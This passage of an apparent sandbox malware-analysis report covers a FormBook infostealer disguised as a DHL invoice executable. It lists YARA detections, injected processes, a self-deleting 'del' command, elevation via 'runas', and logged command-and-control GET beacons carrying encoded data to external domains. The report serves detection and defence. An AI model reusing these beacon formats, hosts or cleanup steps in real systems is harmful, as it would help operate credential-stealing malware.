server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49164	84.32.84.32	80	1244	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 21:37:12.860311031 CEST	178	OUT	GET /jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ HTTP/1.1 Host: www.arthemis-168bet.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 25, 2024 21:37:13.384753942 CEST	1236	IN	HTTP/1.1 200 OK Server: hcdn Date: Thu, 25 Jul 2024 19:37:13 GMT Content-Type: text/html Content-Length: 10072 Connection: close Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 8f7145b4d17f57a0e2b8322fc0c36a40-bos-edge3 Expires: Thu, 25 Jul 2024 19:37:12 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
Jul 25, 2024 21:37:13.385488987 CEST	1236	IN	Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
Jul 25, 2024 21:37:13.385503054 CEST	1236	IN	Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
Jul 25, 2024 21:37:13.388696909 CEST	1236	IN	Data Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
Jul 25, 2024 21:37:13.388710022 CEST	1236	IN	Data Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
Jul 25, 2024 21:37:13.392180920 CEST	1236	IN	Data Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
Jul 25, 2024 21:37:13.392194986 CEST	1236	IN	Data Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)\|\|56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
Jul 25, 2024 21:37:13.395680904 CEST	1236	IN	Data Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=sp,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
Jul 25, 2024 21:37:13.395697117 CEST	524	IN	Data Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74 Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49165	162.241.203.16	80	1244	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 21:37:34.489799023 CEST	170	OUT	GET /jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ HTTP/1.1 Host: www.ilovetvs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 25, 2024 21:37:35.428119898 CEST	444	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 25 Jul 2024 19:37:34 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://ilovetvs.com/jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ Content-Length: 0 Content-Type: text/html; charset=UTF-8
Jul 25, 2024 21:37:35.428910971 CEST	444	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 25 Jul 2024 19:37:34 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://ilovetvs.com/jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ Content-Length: 0 Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	15:35:16
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Imagebase:	0x1240000
File size:	1'120'256 bytes
MD5 hash:	5EC011058B0884BC3B13563F97231C58
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:35:17
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Imagebase:	0x100000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:35:18
Start date:	25/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xff2f0000
File size:	3'229'696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	15:35:18
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cscript.exe"
Imagebase:	0x350000
File size:	126'976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:35:22
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase:	0x49dc0000
File size:	302'592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	3.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	70

Executed Functions

Function 012442DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0124430D

Part of subcall function 01246B57: _wcslen.LIBCMT ref: 01246B6A

GetCurrentProcess.KERNEL32(?,012DCB64,00000000,?,?), ref: 01244422
IsWow64Process.KERNEL32(00000000,?,?), ref: 01244429
LoadLibraryA.KERNEL32(kernel32.dll), ref: 01244454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 01244466
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 01244474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0124447B
GetSystemInfo.KERNEL32(?,?,?), ref: 012444A0

Strings

|O, xrefs: 012836F8
GetNativeSystemInfo, xrefs: 01244460
kernel32.dll, xrefs: 0124444F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 2ceb1aa19123d6380895fe790d84667d09df355f359c388599513cf634ae24e8
Instruction ID: d0f14fb9518f833ce32127b10d786f408183cff192c93a08875c1ca50b358036
Opcode Fuzzy Hash: 2ceb1aa19123d6380895fe790d84667d09df355f359c388599513cf634ae24e8
Instruction Fuzzy Hash: B0A19565A2A2D1CFCB3AE77DB4452D97FACBB26704F085C9ED34193A4ED2608508CB25

Function 012442A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 012442B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,012450AA,?,?,00000000,00000000), ref: 012442C9
LoadResource.KERNEL32(?,00000000,?,?,012450AA,?,?,00000000,00000000,?,?,?,?,?,?,01244F20), ref: 012835BE
SizeofResource.KERNEL32(?,00000000,?,?,012450AA,?,?,00000000,00000000,?,?,?,?,?,?,01244F20), ref: 012835D3
LockResource.KERNEL32(012450AA,?,?,012450AA,?,?,00000000,00000000,?,?,?,?,?,?,01244F20,?), ref: 012835E6

Strings

SCRIPT, xrefs: 012442BF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 8b399885a6d53ebd74ff43c549d5a2b8cb43605cd030752cc6253b819536e1e5
Instruction ID: f6cc1ad69c72b86987ae05bc074e83c9c69d14e08215be77363425cc175d1b0c
Opcode Fuzzy Hash: 8b399885a6d53ebd74ff43c549d5a2b8cb43605cd030752cc6253b819536e1e5
Instruction Fuzzy Hash: 4E119AB0601601BFEB259BA9EC4CF277BB9EBC5B51F10416EF60686280DB71D810C620

Function 01282BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 01242B6B

Part of subcall function 01243A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01311418,?,01242E7F,?,?,?,00000000), ref: 01243A78

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

GetForegroundWindow.USER32 ref: 01282C10
ShellExecuteW.SHELL32(00000000,?,?,01302224), ref: 01282C17

Strings

runas, xrefs: 01282C0B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 25069d070209ae460e28a4e8b18ec8397e8252b827a5c9138067b8edbc8488b5
Instruction ID: 069b03b67634c7a66b86adce2419e3d2e82588708bda5ad6edf2794b05173358
Opcode Fuzzy Hash: 25069d070209ae460e28a4e8b18ec8397e8252b827a5c9138067b8edbc8488b5
Instruction Fuzzy Hash: A8112631668347ABDB1DFF74E854ABEBBA8AFB5604F44141CF28212191DF708589C752

Function 012ADBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,01285222), ref: 012ADBCE
GetFileAttributesW.KERNELBASE(?), ref: 012ADBDD
FindFirstFileW.KERNELBASE(?,?), ref: 012ADBEE
FindClose.KERNEL32(00000000), ref: 012ADBFA

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 8914f0edfc60a32de548fb9980fa5f9dfee81704c51af0beb8d04255539258ed
Instruction ID: 3e524caf37baad22b63a1c5f7a3ea07b16f0a534ba8b6eb1fd8a2349fd63f784
Opcode Fuzzy Hash: 8914f0edfc60a32de548fb9980fa5f9dfee81704c51af0beb8d04255539258ed
Instruction Fuzzy Hash: 92F0EC30C215145792306BBCFC0D46A377D9E01334BD04716F575C14D4EBB45964C7D5

Function 0127333F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0126E505), ref: 0127337E

Strings

GetSystemTimePreciseAsFileTime, xrefs: 01273350, 0127335A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: ddb31f07d972ffaf080749302f11248d764aded4b756893bebb8a6865380d7b6
Instruction ID: 8f0015a3f16ad9cbd60dff839582c0b990c5cc19f801bf5e036c61f6b7e93b61
Opcode Fuzzy Hash: ddb31f07d972ffaf080749302f11248d764aded4b756893bebb8a6865380d7b6
Instruction Fuzzy Hash: F2E0E531A61218EBD331AB669C0AD7FBB98DB56B50B80026EF9065B640CD714D10A7DA

Function 012609D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 012609DA

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
